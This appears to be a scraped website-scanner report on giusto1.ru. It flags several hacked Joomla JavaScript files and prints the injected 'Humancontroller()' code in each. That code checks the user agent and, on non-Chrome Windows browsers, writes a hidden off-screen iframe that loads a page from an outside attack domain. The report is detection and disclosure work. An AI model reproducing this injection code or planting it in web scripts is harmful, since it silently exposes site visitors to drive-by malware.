Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=giusto1.ru
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.giusto1.ru/ | 200 OK Content-Length: 16421 Content-Type: text/html | clean |
http://www.giusto1.ru/components/com_proofreader/js/proofreader.js | 200 OK Content-Length: 4560 Content-Type: application/x-javascript | malicious |
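Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com. The same Humancontroller() prefix appears at the top of every file flagged below; it writes an off-screen iframe pointing to that domain only when the user-agent string contains "Windows" (after its first character) and does not contain "Chrome". Injected code, followed by the start of the original file: function Humancontroller() {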
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); var gecko; function keyPressInit(){ if (document.addEventListener){ document.addEventListener("keypress",function(e){keyAction(e)},true); if (navigator.appName == "Microsoft Internet Explorer") return; document.addEventListener("keydown", functio ...[4318 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/components/com_proofreader/js/xajax.js | 200 OK Content-Length: 17227 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); function Xajax(){this.arrayContainsValue=function(array,valueToCheck){for(i in array){if(array[i]==valueToCheck)return true;}return false;};this.DebugMessage=function(text){if(text.length > 1000)text=text.substr(0,1000)+"...\n[long response]\n...";try{if(this.debugWindo ...[3628 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/media/system/js/caption.js | 200 OK Content-Length: 2475 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var cap ...[1144 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/components/com_jcomments/js/jcomments-v2.0.js | 200 OK Content-Length: 26588 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); function JCommentsEvents(){} function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments ...[3532 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 4493 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.ex ...[4202 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/templates/gusto-index/js/jquery-all-script.js | 200 OK Content-Length: 106742 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); (function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a ...[3508 bytes skipped]... Antivirus reports:
| ||
http://www.giusto1.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://www.giusto1.ru/index.php | 200 OK Content-Length: 16439 Content-Type: text/html | clean |
http://www.giusto1.ru/new-menu.html | 200 OK Content-Length: 18870 Content-Type: text/html | clean |
http://www.giusto1.ru/templates/gusto-all/js/swfobject_modified.js | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
http://www.giusto1.ru/test404page.js | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
http://www.giusto1.ru/banket-xoll.html | 200 OK Content-Length: 31619 Content-Type: text/html | clean |
http://www.giusto1.ru/plugins/content/multithumb/greybox/AJS.js | 200 OK Content-Length: 11167 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); AJS={BASE_URL:"",drag_obj:null,drag_elm:null,_drop_zones:[],_cur_pos:null,join:function(_1,_2){ try{ return _2.join(_1); } catch(e){ var r=_2[0]||""; AJS.map(_2,function(_4){ r+=_1+_4; },1); return r+""; } },getScrollTop:function ...[4016 bytes skipped]... Decoded script: ...[5038 bytes skipped]... n() { return AJS.createDOM.apply(null, ['dd', arguments]); } AJS.SMALL=function() { return AJS.createDOM.apply(null, ['small', arguments]); } AJS.SMALL=function() { return AJS.createDOM.apply(null, ['small', arguments]); } AJS.PRE=function() { return AJS.createDOM.apply(null, ['pre', arguments]); } AJS.PRE=function() { return AJS.createDOM.apply(null, ['pre', arguments]); } <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/plugins/content/multithumb/greybox/AJS_fx.js | 200 OK Content-Length: 3671 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); AJS.fx={_shades:{0:"ffffff",1:"ffffee",2:"ffffdd",3:"ffffcc",4:"ffffbb",5:"ffffaa",6:"ffff99"},highlight:function(_1,_2){ var _3=new AJS.fx.Base(); _3.elm=AJS.$(_1); _3.setOptions(_2); _3.options.duration=600; AJS.update(_3,{increase:function(){ if( ...[3424 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: giusto1.ru
Result:
GET / HTTP/1.1
Host: giusto1.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: giusto1.ru
Referer: http://www.google.com/search?q=giusto1.ru
Result:
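The result is similar to the first query. There are no suspicious redirects found. Note that this check covers only HTTP redirects; the iframe written by the flagged JavaScript files above is loaded client-side by the browser and would not appear in this result.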
GET / HTTP/1.1
Host: giusto1.ru
Referer: http://www.google.com/search?q=giusto1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.